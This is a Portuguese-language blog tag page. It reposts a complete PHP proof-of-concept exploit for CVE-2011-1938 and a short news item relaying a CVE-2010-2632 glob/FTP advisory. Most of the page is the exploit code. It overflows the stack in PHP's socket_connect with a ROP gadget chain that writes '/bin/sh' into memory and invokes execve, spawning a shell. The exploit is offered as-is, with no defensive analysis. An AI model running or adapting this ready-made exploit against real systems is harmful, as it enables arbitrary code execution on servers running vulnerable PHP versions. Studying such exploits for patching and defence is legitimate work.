Skip to content
AppUnix

Tag: netbsd

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

04/07/2011 by OwnServer

/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE-2011-1938\n\n";

# Gadgets in /usr/bin/php
define('DUMMY', "\x42\x42\x42\x42"); // padding
define('STACK', "\x20\xba\x74\x08"); // .data 0x46a0 0x874ba20
define('STACK4', "\x24\xba\x74\x08"); // STACK + 4
define('STACK8', "\x28\xba\x74\x08"); // STACK + 8
define('STACK12', "\x3c\xba\x74\x08"); // STACK + 12
define('INT_80', "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define('INC_EAX', "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Fonte: http://www.exploit-db.com/exploits/17486/

BLOG: Vulnerabilidade compromete uso de FTP em servidores Unix-Like

07/10/2010 by OwnServer

Uma notícia muito importante foi divulgada recentemente.  A biblioteca Libc/Glob é utilizada neste exploit, o qual o site http://securityreason.com/securityalert/7822 especifica detalhadamente. Segundo a publicação,  a vulnerabilidade já atingiu empresas de grande porte como até mesmo Adobe. Confira abaixo um trecho:

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
– – Dis.: 06.11.2009
– – Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
– – OpenBSD 4.7
– – NetBSD 5.0.2
– – FreeBSD 7.3/8.1
– – Oracle Sun Solaris 10
– – GNU Libc (glibc)

Affected Ftp Servers:
– – ftp.openbsd.org (verified 02.07.2010: “connection refused” and ban)
– – ftp.netbsd.org (verified 02.07.2010: “connection limit of 160 reached”
and ban)
– – ftp.freebsd.org
– – ftp.adobe.com
– – ftp.hp.com
– – ftp.sun.com
– – more more and more

Affected Vendors (not verified):
– – Apple
– – Microsoft Interix
– – HP
– – more more more

O anúncio principal encontra-se em http://securityreason.com/achievement_securityalert/89

Iremos acompanhar esta thread de perto.
Reportaremos caso possamos descobrir algo a mais sobre esta impactante notícia.

Pesquisa

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2022 AppUnix | Built using WordPress and MxGuard